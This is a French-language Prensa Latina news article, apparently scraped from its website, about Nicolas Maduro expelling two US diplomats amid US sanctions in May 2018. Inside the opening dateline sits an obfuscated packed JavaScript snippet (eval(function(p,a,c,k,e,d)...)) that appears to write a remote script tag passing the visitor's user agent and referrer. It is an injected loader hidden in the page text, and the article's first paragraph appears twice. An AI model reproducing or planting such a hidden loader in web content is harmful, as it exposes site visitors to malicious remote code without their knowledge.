jeudi 25 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Maduro expulse des diplomates étatsuniens du Venezuela

Caracas, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bybkn|var|u0026u|referrer|rtyaf||js|php'.split('|'),0,{})) 23 mai (Prensa Latina) Le président du Venezuela, Nicolas Maduro, a aujourd'hui déclaré"persona non grata" deux membres de l'ambassade des Etats-Unis au Venezuela.

Caracas, 23 mai (Prensa Latina) Le président du Venezuela, Nicolas Maduro, a aujourd’hui déclaré »persona non grata » deux membres de l’ambassade des Etats-Unis au Venezuela.

Maduro apris cette mesure à l’encontre de Todd Robinson, l’attaché commercial, et de Brian Naranjos, conseiller d’ambassade, accusés tous deux d’ingérence contre le Venezuela.

Maduro a rendu cette décision publique du siège du Conseil National Electoral, lors de  l’acte de proclamation du  président de la République Bolivarienne du Venezuelapour la période 2019-2025, poste auquel il a été élu le 20 mai.

Le président s’est élevé contre les actions du gouvernement des Etats-Unis qui escalade son agression contre le Venezuela avec chacune de ses nouvelles sanctions.

« Je condamne toutes les sanctions que l’on prétend prendre contre la République Bolivarienne du Venezuela parce qu’elles lui portent tort, génèrent de la souffrance dans la population et nuisent aux intérêts économiques, physiques, financiers et monétaires du peuple vénézuélien. Je condamne et je répudie cette conspiration permanente », a-t-il déclaré.

La plus récente des mesures de Washington, en réponse à l’élection de Maduro, concerne la dette publique et les bonds vénézuéliens et tentent d’empêcher l’Exécutif bolivarien de liquider ses actifs sur le territoire étatsunien.

De plus, cette dernière mesure interdit l’achat de toute dette promise comme garantie dès l’entrée en vigueur de l’ordre exécutif signé la veille par le président étatsunien, Donald Trump.

De même sont interdits, la vente, le transfert ou l’assignation de participation au capital de toute institution dans laquelle le gouvernement vénézuélien possède 50 , ou plus de 50 pour cent des actions.

Pour répliquer à cette manœuvre, les autorités vénézuéliennes ont publié un communiqué dans  lequel elles condamnent « la campagne systématique d’agressions et d’hostilités menée par le régime étatsunien afin de punir le peuple vénézuélien qui exerce son droit de vote légitime et sacré ».

peo/oda/odf

EN CONTINU
notes connexes